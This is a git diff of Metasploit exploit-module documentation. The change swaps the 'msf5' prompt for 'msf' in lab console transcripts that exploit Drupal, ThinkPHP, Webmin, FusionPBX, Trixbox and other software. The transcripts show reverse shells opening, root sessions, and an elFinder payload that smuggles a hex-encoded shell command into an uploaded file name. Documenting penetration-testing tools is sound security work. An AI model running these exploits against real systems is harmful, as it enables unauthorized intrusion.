@@ -104,22 +104,22 @@ Exploit target: 0 Universal -msf5 exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0 +msf exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0 LHOST => 10.10.10.20 -msf5 exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10 +msf exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10 RHOSTS => 10.10.10.10 -msf5 exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin +msf exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin USERNAME => admin -msf5 exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin +msf exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin PASSWORD => admin -msf5 exploit(unix/ssh/arista_tacplus_shell) > check +msf exploit(unix/ssh/arista_tacplus_shell) > check [+] 10.10.10.10:22 - The target is vulnerable. -msf5 exploit(unix/ssh/arista_tacplus_shell) > exploit -j +msf exploit(unix/ssh/arista_tacplus_shell) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.10.10.20:4444 [*] 10.10.10.10:22 - Attempt to login to the Arista's restricted shell... -msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established. +msf exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established. [*] Requesting pty rbash [+] Pty successfully obtained. [*] Requesting a shell. @@ -127,7 +127,7 @@ msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established. [*] Attempting to break out of Arista rbash... [+] Escaped from rbash! [*] Command shell session 1 opened (10.01.10.20:4444 -> 10.10.10.10:51153) at 2020-06-09 15:39:53 -0700 -msf5 exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1 +msf exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1 [*] Starting interaction with 1... bash-4.3# whoami whoami 
@@ -136,5 +136,5 @@ bash-4.3# exit exit exit [*] 10.10.10.10 - Command shell session 1 closed. -msf5 exploit(unix/ssh/arista_tacplus_shell) > +msf exploit(unix/ssh/arista_tacplus_shell) > ``` diff --git a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md index c232a76f55..10dfbca68a 100644 --- a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md @@ -34,12 +34,12 @@ Set this to the Ajenti base path. The default is `/`. ### Tested Ajenti 2.1.31 on Ubuntu 19.10 x64 ``` -msf5 > use exploit/unix/webapp/ajenti_auth_username_cmd_injection -msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.135 +msf > use exploit/unix/webapp/ajenti_auth_username_cmd_injection +msf exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.135 RHOSTS => 172.16.172.135 -msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1 +msf exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1 LHOST => 172.16.172.1 -msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit +msf exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit [*] Started reverse TCP handler on 172.16.172.1:4444 [*] Exploiting... diff --git a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md index 61c20318dd..52b66cb54e 100644 --- a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md +++ b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md 
@@ -60,7 +60,7 @@ The username for the Bolt CMS account to authenticate with. This option is requi ### Bolt CMS 3.7.0 running on CentOS 7 ``` -msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options +msf exploit(unix/webapp/bolt_authenticated_rce) > show options Module options (exploit/unix/webapp/bolt_authenticated_rce): @@ -96,7 +96,7 @@ Exploit target: 2 Linux (cmd) -msf5 exploit(unix/webapp/bolt_authenticated_rce) > run +msf exploit(unix/webapp/bolt_authenticated_rce) > run [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -116,7 +116,7 @@ uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfi ### Bolt CMS 3.7.0 running on Ubuntu 18.04 ``` -msf5 exploit(unix/webapp/bolt_authenticated_rce) > options +msf exploit(unix/webapp/bolt_authenticated_rce) > options Module options (exploit/unix/webapp/bolt_authenticated_rce): @@ -152,7 +152,7 @@ Exploit target: 1 Linux (x64) -msf5 exploit(unix/webapp/bolt_authenticated_rce) > run +msf exploit(unix/webapp/bolt_authenticated_rce) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index 84a6ee5a66..ad946cc7b4 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md 
@@ -79,19 +79,19 @@ Defaults to `/tmp`, but other options may include `/var/tmp` and Drupal 7.57 from the Docker image is tested below. ``` -msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 +msf > use exploit/unix/webapp/drupal_drupalgeddon2 +msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 rhost => 172.17.0.3 -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true +msf exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true verbose => true -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check +msf exploit(unix/webapp/drupal_drupalgeddon2) > check [*] Drupal 7 targeted at http://172.17.0.3/ [+] Drupal appears unpatched in CHANGELOG.txt [*] Executing with printf(): sdHl4fLONOKfVZL1cEvXuJCuSkue [+] Drupal is vulnerable to code execution [+] 172.17.0.3:80 The target is vulnerable. -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run +msf exploit(unix/webapp/drupal_drupalgeddon2) > run [*] Started reverse TCP handler on 172.17.0.1:4444 [*] Drupal 7 targeted at http://172.17.0.3/ diff --git a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md index dd81eb9377..27341f3946 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md +++ b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md @@ -53,7 +53,7 @@ output. Defaults to `false` unless `cmd/unix/generic` is your payload. ## Usage ``` -msf5 exploit(unix/webapp/drupal_restws_unserialize) > run +msf exploit(unix/webapp/drupal_restws_unserialize) > run [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Drupal 8 targeted at http://127.0.0.1/ diff --git a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md index 3f33899659..612710e193 100644 
--- a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md @@ -57,16 +57,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253 + msf > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253 rhosts => 172.16.191.253 - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47 + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47 targeturi => /elFinder-2.1.47 - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true verbose => true - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check [*] 172.16.191.253:80 - The target service is running, but could not be validated. - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes) diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md index c35d535470..48d9b03a17 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md 
+++ b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md @@ -48,16 +48,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214 + msf > use exploit/unix/webapp/fusionpbx_exec_cmd_exec + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214 rhosts => 172.16.191.214 - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin username => admin - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc password => PXRtwZqSkvToC4gc - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets Exploit targets: @@ -68,7 +68,7 @@ 2 Automatic (Linux Dropper) - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] Authenticated as user 'admin' diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md index 0dcacd7ce6..70923bdaf7 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md 
@@ -71,16 +71,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set rhosts 172.16.191.214 + msf > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set rhosts 172.16.191.214 rhosts => 172.16.191.214 - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set username test + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set username test username => test - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set password wBXxcY4LTAsMd46! + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set password wBXxcY4LTAsMd46! password => wBXxcY4LTAsMd46! - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set lhost 172.16.191.165 + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > run + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > run [*] Started reverse TCP double handler on 172.16.191.165:4444 [+] Authenticated as user 'test' diff --git a/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md b/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md index 4f63cb5f9b..4b35e2db6b 100644 --- a/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md +++ b/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md @@ -18,7 +18,7 @@ ### Joomla 3.7.0 on Windows 7 SP1 with Super User authenticated ``` -msf5 exploit(unix/webapp/joomla_comfields_sqli_rce) > run +msf exploit(unix/webapp/joomla_comfields_sqli_rce) > run [*] Started reverse TCP handler on 172.22.222.138:4444 [*] 172.22.222.122:80 - Retrieved table prefix [ unqi0 ] 
diff --git a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md index 1fbaac76b7..97886923ca 100644 --- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md +++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md @@ -36,13 +36,13 @@ You may want to use another tool like `dirb` to handle enumeration. ## Usage ``` -msf5 exploit(unix/webapp/jquery_file_upload) > check +msf exploit(unix/webapp/jquery_file_upload) > check [*] Checking /jQuery-File-Upload/package.json [+] Found Apache 2.4.18 (AllowOverride None may be set) [+] Found unpatched jQuery File Upload 9.22.0 [*] 172.28.128.3:80 The target appears to be vulnerable. -msf5 exploit(unix/webapp/jquery_file_upload) > run +msf exploit(unix/webapp/jquery_file_upload) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Checking /jQuery-File-Upload/package.json diff --git a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md index be4b43864e..2ba01b30fb 100644 --- a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md 
@@ -33,14 +33,14 @@ The HTTP server virtual host. You will probably need to configure this as well, Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64 ``` -msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection -msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152 +msf > use exploit/unix/webapp/opennetadmin_ping_cmd_injection +msf exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152 RHOSTS => 172.16.172.152 -msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com +msf exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com VHOST => example.com -msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1 +msf exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1 LHOST => 172.16.172.1 -msf5 exploit(opennetadmin_ping_cmd_injection) > exploit +msf exploit(opennetadmin_ping_cmd_injection) > exploit [*] Started reverse TCP handler on 172.16.172.1:4444 [*] Exploiting... [*] Sending stage (3021284 bytes) to 172.16.172.152 diff --git a/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md b/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md index 8bf73caa21..71873918ff 100644 --- a/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md +++ b/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md 
@@ -31,10 +31,10 @@ The base path to the web application (e.g. `/opensis/`). The default value is `/ **openSIS 7.4 running on Ubuntu 18.04.4** ``` -msf5 > use unix/webapp/opensis_chain_exec -msf5 exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost -msf5 exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/ -msf5 exploit(unix/webapp/opensis_chain_exec) > check +msf > use unix/webapp/opensis_chain_exec +msf exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost +msf exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/ +msf exploit(unix/webapp/opensis_chain_exec) > check [*] Retrieving session cookie [*] Injecting malicious SQL into session variable @@ -42,7 +42,7 @@ msf5 exploit(unix/webapp/opensis_chain_exec) > check [*] Executing PHP code by calling Bottom.php [+] 127.0.0.1:80 - The target is vulnerable. -msf5 exploit(unix/webapp/opensis_chain_exec) > run +msf exploit(unix/webapp/opensis_chain_exec) > run [*] Started reverse TCP handler on 127.0.0.1:4444 [*] Retrieving session cookie diff --git a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md index 97919c83c6..40c91525ae 100644 --- a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md 
@@ -32,17 +32,17 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131 + msf > use exploit/unix/webapp/rconfig_install_cmd_exec + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131 rhosts => 172.16.191.131 - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true verbose => true - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > check + msf exploit(unix/webapp/rconfig_install_cmd_exec) > check [*] Executing command: id [*] Response: uid=48(apache) gid=48(apache) groups=48(apache) [+] 172.16.191.131:443 - The target is vulnerable. - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > show targets + msf exploit(unix/webapp/rconfig_install_cmd_exec) > show targets Exploit targets: @@ -52,13 +52,13 @@ 1 Automatic (Linux Dropper) - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0 + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0 target => 0 - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run + msf exploit(unix/webapp/rconfig_install_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Executing command: id @@ -77,6 +77,6 @@ "" [*] 172.16.191.131 - Command shell session 1 closed. Reason: User exit - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > + msf exploit(unix/webapp/rconfig_install_cmd_exec) > ``` 
diff --git a/documentation/modules/exploit/unix/webapp/thinkphp_rce.md b/documentation/modules/exploit/unix/webapp/thinkphp_rce.md index 3660984024..e4eabefbed 100644 --- a/documentation/modules/exploit/unix/webapp/thinkphp_rce.md +++ b/documentation/modules/exploit/unix/webapp/thinkphp_rce.md @@ -44,8 +44,8 @@ to a different port to bind the command stager server to. ### ThinkPHP 5.0.20 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce) ``` -msf5 > use exploit/unix/webapp/thinkphp_rce -msf5 exploit(unix/webapp/thinkphp_rce) > options +msf > use exploit/unix/webapp/thinkphp_rce +msf exploit(unix/webapp/thinkphp_rce) > options Module options (exploit/unix/webapp/thinkphp_rce): @@ -78,13 +78,13 @@ Exploit target: 1 Linux Dropper -msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1 +msf exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3 +msf exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888 +msf exploit(unix/webapp/thinkphp_rce) > set srvport 8888 srvport => 8888 -msf5 exploit(unix/webapp/thinkphp_rce) > run +msf exploit(unix/webapp/thinkphp_rce) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -115,7 +115,7 @@ meterpreter > ### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce) ``` -msf5 exploit(unix/webapp/thinkphp_rce) > run +msf exploit(unix/webapp/thinkphp_rce) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md b/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md index 8f5b6548b7..3cd15c160e 100644 
--- a/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md +++ b/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md @@ -45,10 +45,10 @@ Follow [Setup](#setup) and [Scenarios](#scenarios). ### Trixbox CE v2.8.0.4 ``` -msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8 +msf > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8 rhosts => 192.168.1.8 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce): @@ -82,9 +82,9 @@ Exploit target: 0 Automatic (Linux Dropper) -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 lhost => 192.168.1.10 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit [*] Started reverse TCP handler on 192.168.1.10:4444 [*] 192.168.1.8:80 - Authenticating using "maint:password" credentials... @@ -112,10 +112,10 @@ asterisk ### Trixbox CE v2.4.0 ``` -msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.7 +msf > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.7 rhosts => 192.168.1.7 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce): 
@@ -149,9 +149,9 @@ Exploit target: 0 Automatic (Linux Dropper) -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 lhost => 192.168.1.10 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit [*] Started reverse TCP handler on 192.168.1.10:4444 [*] 192.168.1.7:80 - Authenticating using "maint:password" credentials... @@ -179,8 +179,8 @@ asterisk ### Trixbox CE v1.2.0 ``` -msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options +msf > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce): @@ -214,13 +214,13 @@ Exploit target: 0 Automatic (Linux Dropper) -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set LHOST 192.168.205.1 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set LHOST 192.168.205.1 LHOST => 192.168.205.1 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set SRVHOST 192.168.205.1 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set SRVHOST 192.168.205.1 SRVHOST => 192.168.205.1 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set RHOSTS 192.168.205.148 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set RHOSTS 192.168.205.148 RHOSTS => 192.168.205.148 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit [*] Started reverse TCP handler on 192.168.205.1:4444 [*] 192.168.205.148:80 - Authenticating using "maint:password" credentials... 
diff --git a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md index d28421dc43..422c58d9cd 100644 --- a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md +++ b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md @@ -25,14 +25,14 @@ Use default installation path `/usr/share/webmin/` ### Tested Webmin 1.900 on Ubuntu 18.04 x64 ``` -msf5 > use exploit/unix/webapp/webmin_upload_exec -msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154 +msf > use exploit/unix/webapp/webmin_upload_exec +msf exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154 rhosts => 172.22.222.154 -msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser +msf exploit(unix/webapp/webmin_upload_exec) > set username unixuser username => unixuser -msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser +msf exploit(unix/webapp/webmin_upload_exec) > set password unixuser password => unixuser -msf5 exploit(unix/webapp/webmin_upload_exec) > exploit +msf exploit(unix/webapp/webmin_upload_exec) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [+] Session cookie: 6215747dab393701e0acbb9ac5b7c699 @@ -41,9 +41,9 @@ msf5 exploit(unix/webapp/webmin_upload_exec) > exploit [-] Failed to determine webmin share directory [-] Set GUESSUPLOAD to attempt upload to a default location [*] Exploit completed, but no session was created. -msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true +msf exploit(unix/webapp/webmin_upload_exec) > set guessupload true guessupload => true -msf5 exploit(unix/webapp/webmin_upload_exec) > exploit +msf exploit(unix/webapp/webmin_upload_exec) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [+] Session cookie: 46cbd354e4532fe55d1a462db128905c 
diff --git a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md index 476a72c016..92b9d000f2 100644 --- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md +++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md @@ -56,8 +56,8 @@ This is the default setting. ### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3 ``` -msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > options +msf > use exploit/unix/webapp/wp_infinitewp_auth_bypass +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > options Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass): @@ -88,13 +88,13 @@ Exploit target: 0 InfiniteWP Client < 1.9.4.5 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1 +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000 +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000 rport => 8000 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1 +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md index 4f4a508212..72ff66756a 100644 --- a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md +++ b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md 
